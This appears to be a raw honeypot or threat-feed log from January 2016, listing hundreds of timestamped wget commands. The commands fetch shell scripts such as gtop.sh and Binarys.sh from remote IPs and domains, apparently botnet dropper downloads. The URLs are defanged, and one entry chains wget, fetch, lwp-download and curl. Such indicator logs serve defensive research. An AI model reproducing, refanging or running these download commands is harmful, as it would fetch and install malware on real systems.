2016-01-30 21:52:47 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-30 21:52:47 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-30 20:33:49 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-30 20:00:15 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-30 16:11:18 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 15:01:18 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 14:33:02 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 14:01:08 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 12:42:52 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 08:50:39 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 04:56:37 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 04:27:22 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 04:15:01 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 03:59:18 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-30 03:41:57 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 03:25:40 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 03:23:29 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 03:18:14 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 03:13:12 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 02:50:41 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-30 02:16:54 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 01:48:32 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 01:27:04 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-30 01:03:57 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-30 00:38:02 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 23:25:54 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 23:25:51 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 22:21:59 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 21:58:26 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 20:42:17 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 16:09:21 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 16:00:25 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 15:48:44 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-29 15:38:32 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 15:07:50 | wget hxxp:// 173.214.160.90/gtop . sh
2016-01-29 12:38:33 | wget hxxp:// 173.214.160.90/gtop . sh-O /tmp/gtop . sh
2016-01-29 12:12:42 | wget hxxp:// 173.214.160.90/gtop . sh-O /tmp/gtop . sh
2016-01-29 06:51:54 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 06:51:51 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 06:04:44 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-29 05:43:58 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 05:43:56 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-29 02:37:01 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-29 02:04:59 | wget hxxp:// 107.172.23.133/gtop . sh
2016-01-29 01:46:33 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-29 01:27:27 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-29 01:04:07 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-29 00:00:28 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-28 23:27:28 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-28 22:49:46 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-28 20:17:10 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-28 14:22:53 | wget hxxp:// 198.23.238.251/gb . sh
2016-01-28 11:44:52 | wget ftx://23.89.158.69/gtop . sh
2016-01-28 11:30:23 | wget ftx://23.89.158.69/gtop . sh
2016-01-28 07:35:08 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-28 07:35:08 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-28 04:11:21 | wget -q hxxp:// 162.213.195.144/Bots/f . sh
2016-01-27 20:34:49 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-27 20:34:47 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-27 16:07:37 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-27 12:40:52 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-27 11:36:57 | wget ftx://23.89.158.69/gtop . sh-O /tmp/gtop . sh
2016-01-27 11:26:49 | wget ftx://23.89.158.69/gtop . sh
2016-01-27 10:50:10 | wget ftx://23.89.158.69/gtop . sh
2016-01-27 10:07:17 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-26 08:01:29 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-26 08:01:26 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-25 21:33:13 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-25 21:05:57 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-25 18:30:30 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 18:03:35 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 17:23:50 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 17:10:36 | wget -q hxxp:// 185.130.5.205/bin . sh; 
                              fetch hxxp:// 185.130.5.205/bin . sh; 
                              lwp-download hxxp:// 185.130.5.205/bin . sh; 
                              curl -O hxxp:// 185.130.5.205/bin . sh
2016-01-25 17:07:52 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 17:00:40 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 15:19:33 | wget hxxp:// 163.47.11.201/gtop . sh
2016-01-25 15:06:55 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 14:48:06 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 04:16:09 | wget hxxp:// 46.101.71.240/gtop . sh
2016-01-25 04:04:00 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 03:46:01 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-25 03:24:12 | wget hxxp:// 178.19.111.244/bin . sh
2016-01-25 02:54:05 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-25 02:53:59 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-25 02:25:41 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 02:19:41 | wget hxxp:// 208.67.1.2/DOGDICKS/Binarys . sh
2016-01-25 01:34:10 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-25 01:33:39 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-25 01:13:21 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 00:50:59 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-25 00:21:05 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 23:37:31 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-24 22:46:40 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-24 22:44:21 | wget hxxp:// 178.19.111.244/bin . sh
2016-01-24 22:29:34 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-24 22:25:10 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 21:49:52 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-24 12:56:39 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 11:32:43 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 08:20:29 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-24 08:20:26 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-24 07:22:52 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 06:37:33 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 04:40:34 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 04:10:18 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-24 02:17:06 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-24 01:37:50 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-24 01:18:03 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-24 00:58:46 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-23 23:40:45 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-23 21:15:50 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-23 20:42:40 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-23 16:36:16 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-23 14:55:17 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-23 13:04:09 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-23 10:03:03 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-23 06:47:26 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-23 06:16:59 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-23 04:28:24 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-23 04:09:07 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-23 02:47:09 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 20:51:48 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 19:48:54 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 19:47:24 | wget hxxp:// 178.19.111.244/y . sh
2016-01-22 19:27:17 | wget hxxp:// 178.19.111.244/y . sh
2016-01-22 19:27:15 | wget hxxp:// 178.19.111.244/y . sh
2016-01-22 17:50:05 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 16:44:18 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 15:56:34 | wget hxxp:// 206.72.207.194/gtop . sh
2016-01-22 05:51:56 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-22 03:24:22 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-21 22:10:20 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-21 17:49:26 | wget hxxp:// iplogger.xyz/DOGDICKS/Binarys . sh
2016-01-21 16:21:59 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-21 13:52:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 13:52:01 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 07:26:36 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-21 07:02:10 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-21 03:22:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 03:09:41 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 02:28:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 02:24:19 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-21 02:10:30 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-20 23:57:05 | wget hxxp:// www.hongcherng.com/sc/sc . sh-O /tmp/sc . sh
2016-01-20 22:32:51 | wget hxxp:// binarys.x10.mx/qbot/Binarys . sh
2016-01-20 21:56:08 | wget hxxp:// binarys.x10.mx/qbot/Binarys . sh
2016-01-20 21:49:01 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 21:38:36 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 21:07:50 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 20:33:28 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 17:10:47 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 16:13:02 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 10:49:05 | wget hxxp:// 198.23.238.251/gb . sh
2016-01-20 09:41:22 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 09:34:12 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 07:07:37 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 06:51:52 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 06:41:03 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 06:01:47 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 05:46:11 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 05:14:29 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-20 05:13:02 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 05:02:00 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 04:11:57 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-20 03:57:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 03:13:32 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 03:05:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 02:27:34 | wget hxxp:// binarys.x10.mx/qbot/Binarys . sh
2016-01-20 02:19:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 01:42:34 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 01:27:42 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 01:14:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 00:35:57 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 00:24:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 23:58:11 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-19 23:19:08 | wget 192.227.170.67/bins . sh
2016-01-19 22:04:11 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 22:01:31 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-19 21:44:34 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 21:21:10 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 21:04:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 20:13:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 16:09:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 15:21:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 15:12:13 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-19 15:12:13 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-19 14:56:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 14:11:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 08:30:58 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 07:58:19 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 04:32:58 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:52:38 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:37:52 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:09:10 | wget hxxp:// 158.69.217.211/gb . sh
2016-01-19 02:03:04 | wget hxxp:// 158.69.217.211/gb . sh
2016-01-18 22:37:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 22:31:33 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 21:48:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 19:16:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 19:09:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:33:30 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:26:36 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 18:25:36 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:08:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 17:47:42 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 17:35:26 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 16:14:46 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 15:50:46 | wget hxxp:// www.hongcherng.com/rd/rd . sh-O /tmp/ich . sh
2016-01-18 15:08:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 14:59:57 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 14:24:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 05:23:27 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 04:21:59 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 03:31:26 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-18 02:47:49 | wget hxxp:// binarys.x10.mx/king/Binarys . sh
2016-01-18 02:31:48 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 02:23:52 | wget hxxp:// binarys.x10.mx/king/Binarys . sh
2016-01-18 02:21:28 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-18 02:15:19 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 01:32:08 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-18 01:31:53 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-18 01:07:15 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 23:48:52 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 22:39:13 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-17 22:30:53 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-17 21:35:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 21:21:12 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 21:08:24 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 20:18:45 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 19:45:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 18:54:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 18:13:59 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 17:57:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 17:03:06 | wget hxxp:// 94.102.49.197/gb-wget . sh
2016-01-17 09:51:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 09:15:53 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 08:37:10 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 06:42:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 05:59:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 01:47:52 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-17 00:39:05 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-16 23:41:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 23:13:19 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 23:09:42 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 22:54:36 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 22:49:27 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 22:23:13 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 22:15:45 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 20:16:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 20:09:38 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 18:43:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 18:33:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 18:07:11 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 17:46:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 17:37:08 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 16:49:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 16:39:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 15:29:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 15:19:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 13:13:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 13:03:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 08:12:22 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-16 08:12:20 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-16 02:50:01 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 23:40:54 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 23:06:34 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 22:56:19 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 22:37:03 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 22:32:13 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 22:20:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 21:20:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 21:09:53 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 21:02:27 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-15 19:44:51 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-15 19:14:54 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 18:26:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 18:15:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 17:31:26 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 17:17:24 | wget hxxp:// www.hongcherng.com/rd/rd . sh-O /tmp/ich . sh
2016-01-15 16:43:10 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 15:26:25 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-15 14:13:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 14:03:12 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 12:40:26 | wget -q hxxp:// 162.208.8.203/p . sh
2016-01-15 07:31:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 07:21:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 07:14:50 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 06:44:14 | wget hxxp:// 216.158.225.7/gtop . sh
2016-01-15 02:38:27 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 02:36:06 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 02:22:57 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 02:05:36 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 01:43:57 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 01:27:01 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 00:43:06 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 00:27:16 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-15 00:12:57 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 23:48:37 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 22:53:28 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 22:45:16 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 22:03:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 21:53:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 21:39:11 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 20:55:24 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 20:26:48 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 17:59:24 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-14 17:45:01 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 17:03:32 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 15:24:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 15:14:55 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 15:01:20 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 14:45:57 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 14:15:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 14:05:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 13:54:38 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 13:43:29 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 10:37:24 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-14 10:37:22 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-14 08:54:03 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-14 00:52:25 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 00:05:18 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-13 22:22:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 22:12:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 21:44:02 | wget ftx://79.143.181.158/gtop . sh
2016-01-13 21:19:52 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 21:16:50 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-13 19:46:09 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 16:48:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 16:38:50 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 16:23:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 16:14:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 15:32:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 15:22:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 15:05:41 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-13 14:31:12 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 14:16:54 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 14:10:12 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 14:09:33 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 13:23:35 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 13:23:33 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 13:18:01 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-13 12:40:02 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 12:39:59 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 10:35:24 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 08:02:52 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 07:21:22 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 07:03:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 06:05:58 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 02:46:30 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-13 02:26:53 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 02:11:42 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 01:20:37 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-13 01:17:04 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 00:35:44 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-13 00:27:29 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-12 23:46:54 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-12 21:44:13 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-12 20:25:49 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-12 16:53:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 16:43:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 16:20:13 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 16:10:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 14:53:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
